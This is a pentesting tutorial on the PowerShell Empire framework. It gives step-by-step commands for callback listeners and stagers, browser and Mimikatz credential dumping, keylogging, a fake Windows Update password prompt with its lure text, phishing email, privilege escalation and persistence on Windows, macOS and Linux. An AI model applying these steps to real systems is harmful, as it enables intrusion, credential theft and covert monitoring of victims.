Ultimate guide to PowerShell Empire: from installation to persistence in the target system

Empire is a popular post-exploitation tool for Windows, Linux, and macOS. This article addresses all key aspects of this framework, including its most frequently used functions. Even if you are a seasoned pentester, you will likely find something new and useful in this material.

The original PowerShell Empire project is maintained no longer, but its fork by BC Security is actively developing.

warning

This article is intended for educational purposes only. Neither the author nor the Editorial Board can be held liable for any damages caused by improper usage of this information.

Installation

If you use Kali Linux, you can install the framework in just one command:

sudo apt install powershell-empire

If you use another system, download the project files and install them manually.

git clone https://github.com/BC-SECURITY/Empire.git
cd Empire
sudo ./setup/install.sh

That’s it: the Empire framework is installed on your PC.

Getting a foothold

Below are the basic terms frequently used in this article:

  • Listener is a local process that listens for a connection from the attacked remote host;
  • Stager is a piece of code that uploads the Agent (i.e. payload) to the attacked remote host;
  • Agent is a process running on the attacked remote host that connects to your Listener; and
  • Module is the code executed by the Agent to achieve certain goals.

Run the framework using the powershell-empire command. You will see a window resembling the one shown below.

Empire
Empire

To get a foothold, you have to perform the following operations: create a listener → create a stager for that listener → launch payload on a remote host (i.e. create an agent).

Listener

To create a listener, open the respective interface using the listeners command.

Listeners interface
Listeners interface

There are no active listeners so far. Prior to creating a listener with the uselistener command, you can see what types of listeners are available in Empire.

uselistener <TAB>
List of available listeners in Empire
List of available listeners in Empire

The above abbreviations refer to the following listener types:

  • dbx – a Dropbox listener (never reveals the attacker’s network to the victim but requires a token for the Dropbox API);
  • http – a standard HTTP/HTTPS listener;
  • http_com – an HTTP/HTTPS listener that uses a hidden EI COM object;
  • http_foreign – an HTTP/HTTPS listener used to inject Empire payloads;
  • http_hop – an HTTP/HTTPS listener that redirects commands to another listener to conceal the initial IP address (the RedirectListener parameter is required);
  • http_mapi – an HTTP/HTTPS listener that uses the Liniaal utility allowing you to gain control over the target host through an Exchange server;
  • meterpreter – an HTTP/HTTPS listener used to inject Meterpreter payloads;
  • onedrive – a onedrive listener (you have to register the https://apps.dev.microsoft.com) app; and
  • redirector – a tool that redirects you from one agent to another one.

Now that you are familiar with the types of listeners, it is time to create one. To select the simplest (HTTP) listener type, enter the command:

uselistener http
Selecting listener type
Selecting listener type

Type info to view help for the selected listener.

Listener options
Listener options

The use of proxies is a common practice nowadays, but you can also specify the date for the listener to be removed from the system, as well as its hours of operation (if you use an HTTPS listener, you also have to specify the path to the certificate). Now it is time to set the listener name, host address for backconnect, and port.

set Name l1
set Host http://192.168.6.1
set Port 4321
Setting listener
Setting listener’s parameters

To start the listener, type execute.

Starting the listener
Starting the listener

Now you can see your listener in the listeners interface.

List of active listeners
List of active listeners

Stager

Similar to the listener, select the stager type using the usestager command.

Types of stagers
Types of stagers

Stagers can be either multiplatform or OS-specific (i.e. targeting only macOS or Windows). They are divided into the following types:

  • bash – an ordinary Bash script;
  • launcher – a one-liner written in a certain scripting language;
  • macro – a macro for office applications;
  • pyinstaller – an ELF file built using PyInstaller;
  • war – a set of bytes used to upgrade a stager;
  • applescript – an AppleScript file;
  • application – an Application file;
  • ducky – a Rubber Ducky script;
  • dylib – a dynamic library is macOS;
  • jar – a payload in the JAR format;
  • machomacOS – an office macro for macOS;
  • pkg – a PKG installer that must be copied to the /Applications directory;
  • safari_launcher – an HTML script for Safari;
  • shellcode – a Windows shell;
  • teensy – a Teensy script;
  • backdoorLnkMacro – a .lnk file used to upload and launch an application;
  • bunny – a Bash bunny script;
  • csharp_exe – a PowerShell/C# application;
  • dll – a stager in the DLL format;
  • hta – an HTA stager for IE;
  • macroless_msword – a macroless document; and
  • wmic – an XSL stager for wmic.exe (not present in original Empire).

Select the stager type, for instance, a bat file for Windows.

Selecting stager type
Selecting stager type

Similar to the listeners, type info to view the available options.

Help for the selected stager
Help for the selected stager

Empire allows you to set up a proxy server and has a built-in obfuscation function (unfortunately, it works only for PowerShell scripts). You can select where to save the resultant bat file and instruct the program to delete it after the execution. So, you specify the listener and path to the resultant bat file and then create a stager.

set Listener l1
set OutFile /home/ralf/tmp/l1.bat
execute
Creating a stager
Creating a stager

The bat file containing the stager has been created and saved in the specified location.

Agent

You have to execute the bat file on the target host. You will see a connection notification.

Connection established and agent created
Connection established and agent created

Go to the main menu and type the agents command to see all agents.

List of agents
List of agents

For convenience purposes, you can rename your agent using the rename command and switch to the agent control interface using the interact command.

rename LVKP4HN3 al1
interact al1
List of agents
List of agents

Now you are in the system, and it’s time to examine the most efficient and frequently used modules.

Windows exploitation and post-exploitation with Empire

Basic options

The basic options are functions implemented in Empire that don’t require third-party modules. The most frequently used ones are:

  • sysinfo (provides system information for a remote host);
  • download/upload (uploads files to a remote host and downloads files from it);
  • sleep (sets an interval for communication with the agent. For instance, if the interval is 60 seconds, the agent receives a command from the operator, puts it into the queue, and then it will clear the queue once a minute and provide the required information);
  • steal_token (impersonates an access token);
  • shell [cmd] (allows to execute a command using cmd.exe);
  • ps (displays the list of processes, including the process name, PID, user in whose context the process is running, and memory used by the process);
  • psinject (injects an agent into another process);
  • scriptimport (allows to load a PowerShell script to the memory);
  • mimikatz (quickly and easily executes sekurlsa::logonpasswords);
  • creds (a local storage of logon credentials (e.g. passwords and hashes) providing quick access to them). Hashes are added automatically when you use various modules, but you can also add and remove them manually. For instance, logon credentials collected using the above-mentioned mimikatz command look as shown below.
Creds local storage in Empire
Creds local storage in Empire

Of course, this list includes not all ‘quick commands’ in Empire, but only the most frequently used ones.

To use additional modules, enter the usemodule command; if you need to find a module, use the searchmodule command.

Searching for dllhijack-related modules
Searching for dllhijack-related modules

Collection modules

Modules present in this section are frequently used in real-life situations. The following tools are used by pentesters to extract passwords and other data from browsers:

  • collection/ChromeDump;
  • collection/FoxDump;
  • collection/SharpChromium.

To launch a module, use the run or execute command. Empire will notify you that the selected module is not opsec safe and will ask whether you want to continue.

Running the SharpChromium module
Running the SharpChromium module

The module retrieves for you all cookies, the history of requests, and saved account credentials.

History of requests and account credentials
History of requests and account credentials

The collection/file_finder module searches for specific files, while the collection/minidump module dumps the specified processes. To monitor information entered by the victim, you can launch a keylogger: collection/keylogger. For instance, if you open Notepad and enter the word test, Empire will record this as follows:

Keylogger output
Keylogger output

The collection/clipboard_monitor modules allows to monitor the clipboard content.

Monitoring clipboard content
Monitoring clipboard content

But the most exciting functions in this section are related to phishing. If you need a password, but failed to authenticate at all the potential entry points, you can ‘ask’ the victim to provide the logon credentials to you using the collection/prompt or collection/toasted modules. For instance, collection/toasted works as follows: a notification that (seemingly) cannot be ignored appears on the victim’s screen (I use the requirement to restart). Regardless of the victim’s response, the authentication window pops-up, and you get the logon credentials entered by the victim.

usemodule collection/toasted
set ToastTitle "Your session will be terminated"
set ToastMessage "The system will restart in 5 minutes. Do you want to postpone the restart?"
set Application "Windows Update"
set CredBoxTitle "Are you sure you want to restart your PC?"
set CredBoxMessage "You must authenticate to perform this action"
run
Restart notification
Restart notification
Authentication window
Authentication window
User login and password
User login and password

Furthermore, the above modules have the VerifyCreds parameter; if it’s set to True, Empire will verify the authenticity of the retrieved account credentials prior to displaying them. If the victim enters incorrect information or makes a typing error, Empire will request credentials again.

Credentials modules

This section contains the PowerShell-based open-source Mimikatz utility embedded in Empire.

Mimikatz modules
Mimikatz modules

The tool is easy-to-use and doesn’t require detailed explanations; so, let’s proceed to the next section.

Mimikatz hashdump
Mimikatz hashdump

Management modules

This sections includes a number of really cool features, including the possibility to enable and disable RDP for the victim using the management/enable_rdp and management/disable_rdp modules. Again, Empire will warn you that these modules are not opsec safe.

Enabling RDP
Enabling RDP
RDP enabled
RDP enabled
Disabling RDP
Disabling RDP
RDP connection failed
RDP connection failed

Empire also includes a tool called EmailRaider; this utility uses its own Outlook client to review and send phishing letters on behalf of a certain user. The management/mailraider/ section contains plenty of powerful modules, but only one of them is frequently used in real life: management/mailraider/send_mail.

Parameters of the send_mail module
Parameters of the send_mail module

This module allows you to create malicious emails and send them out. Normally, victims gladly open letters received from their friends or colleagues, open attached files (even suspicious ones), and follow links sent with such letters.

The last module frequently used for monitoring is called management/vnc. It launches a VNC listener (I use Remmina) and establishes a reverse connection.

Launching VNC
Launching VNC
Remmina
Remmina

Privesc modules

The privilege escalation section is useful for quick security audits. In addition, its privesc/getsystem module allows to switch to the SYSTEM context. Empire includes two well-known scripts: privesc/sherlock (checks the attacked system for CVE vulnerabilities) and privesc/powerup/allchecks (identifies suitable privilege escalation techniques, e.g. substitution of a service file, etc.).

Allchecks
Allchecks
Sherlock
Sherlock

Situational_awareness modules

Modules contained in this extremely useful section are normally used in the very beginning of exploitation. The two most important modules are situational_awareness/host/antivirusproduct and situational_awareness/host/applockerstatus. The first one provides information about antiviruses installed on the attacked host, while the second one collects information about AppLocker.

The situational_awareness/host/computerdetails module allows you to view events 4648 (RDP) and4624 (successful logon) in the Windows Event Viewer, as well as AppLocker logs, executed PSScripts, and saved RDP sessions.

Computerdetails
Computerdetails

The situational_awareness/network/get_spn module allows to scan SPN in a network. In a similar way, situational_awareness/network/powerview/get_domain_trust and situational_awareness/network/powerview/map_domain_trust facilitate your searches for trusts by recursively enumerating all domain trusts accessible from your current position in the network. In my personal opinion, the coolest module in this section is situational_awareness/network/bloodhound3.

Launching BloodHound in Empire
Launching BloodHound in Empire
Downloading BloodHound output from a remote host
Downloading BloodHound output from a remote host

This tool allows you to download files generated by BloodHound from the attacked PC for subsequent analysis on your local PC.

Persistence modules

The key methods used to establish persistence in the target system are:

  • SID History (persistence/misc/add_sid_history);
  • SSP (persistence/misc/memssp); and
  • Skeleton Key (persistence/misc/skeleton_key).

If the user turns off or restarts the target computer, you can use these modules to log on and resume your Empire session. Empire also includes modules that ensure session persistence: persistence/elevated/registry and persistence/elevated/wmi. The only difference between them is that the first module uses the registry to establish persistence, while the second one uses WMI.

Persistence/elevated/registry
Persistence/elevated/registry

Empire executes the selected module and notifies you that persistence has been established. To check whether this it true, you can review the list of agents and then restart the system. After the restart, you will see a new agent on the list.

A new agent appeared on the list after the restart
A new agent appeared on the list after the restart

Done with Windows; now let’s see how Empire can be used for exploitation of other systems.

macOS exploitation and post-exploitation with Empire

Basic modules of a macOS agent are similar to the basic modules of a Windows agent except for one detail: Python is used instead of PowerShell. Accordingly, the pythonscript module is used instead of scriptimport,. The loadpymodule module can be used to load entire programs. The loaded file must be a ZIP archive containing Python scripts or packages. The presence of the __init__.py file is mandatory.

The number of modules for macOS is significantly less in comparison with Windows. For instance, collection/osx/browser_dump can extract the history of requests from the browser, but it won’t show you the cookies and passwords. Modules monitoring the user input operate differently from their Windows analogues; for instance, collection/osx/keylogger saves the history in a special file stored on the remote host, and you have to download this file from it. Another example: to monitor the clipboard using the collection/osx/clipboard module, you have to specify the time of its operation in seconds.

Collection/osx/keylogger
Collection/osx/keylogger

But the phishing function for macOS (the collection/osx/prompt module) is implemented flawlessly.

Collection/osx/prompt
Collection/osx/prompt

Empire allows you to launch App Store and request the user password (which, in most cases, is immediately provided.)

Requesting user password
Requesting user password
The keylogger module retrieves the password
The keylogger module retrieves the password

Even though I have already configured the keylogger, the password is displayed in the Empire window immediately after the input. Overall, the exploitation algorithm for a Mac is simple and successful in 80% of cases:

  1. Phishing letter with a stager → you get an Empire agent;
  2. Using collection/osx/prompt → you get the password (in most cases, sudo);
  3. Using privesc/multi/sudo_spawn to get an agent in the sudo context; and
  4. Entrenching in the system with persistence/osx/loginhook.

According to a popular opinion, Macs are mostly used for data processing and preparation of reports. Therefore, the only possible reason to gain control over such a computer is to monitor its user. The above-described attack takes only 10-15 minutes. Even if the victim is reluctant to enter the password, at the third or fourth attempt, the attacked user will give up and do this.

After getting the sudo credentials, you can monitor all user activities using the management/osx/screen_sharing module that provides you with a VNC. As you can see, Mac computers can be hacked quickly and easily, and the main tool used by the attacker is phishing.

Linux exploitation and post-exploitation with Empire

Basic Empire modules for Linux don’t differ much from the macOS modules. For instance, collection/linux/keylogger uses a similar keylogging mechanism. But the Linux version includes an excellent module called privesc/linux/linux_priv_checker; it extracts information from the target system and helps to identify the privilege escalation vector. The module collects the following data:

  • basic system information;
  • running processes;
  • files that may be of interest to the attacker;
  • writable files;
  • logs that include the word “password”;
  • sudoers settings;
  • software version and related information contained in exploit-db; and
  • development tools available on the host.

To become a superuser, you must know the superuser password. The above-mentioned privesc/multi/sudo_spawn module is used to get it. The listener and sudo password must be specified as parameters.

usemodule privesc/multi/sudo_spawn
set Password user
set Listener l1
run
Using sudo_spawn to create a new agent in the sudo context
Using sudo_spawn to create a new agent in the sudo context

As a result, a new agent operating on behalf of root appears on the list of Empire agents.

List of agents
List of agents

After gaining the superuser rights, you launch two more Empire modules. The first one, collection/linux/mimipenguin, retrieves service passwords. Too bad, it’s not perfect, and sometimes other tools are required as well. The second module, persistence/multi/crontab, establishes persistence via crontab.

Crontab parameters
Crontab parameters

The crontab module requires you to specify the name of a file to be executed at certain intervals of time. The easiest way to maintain persistence is to load the same Empire stager.

Conclusions

In the end, I would like to note automated scenarios for Empire that enable you to collect information and advance through the network. For instance, DeathStar automates frequently used attack scenarios targeting Windows-based systems (see the article Lateral movement in Active Directory. Offensive techniques used to attack the domain).

www

For those interested in this topic, I created @RalfHackerChannel on Telegram where you can ask any questions (or answer questions of other users). See you there!


Leave a Reply

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">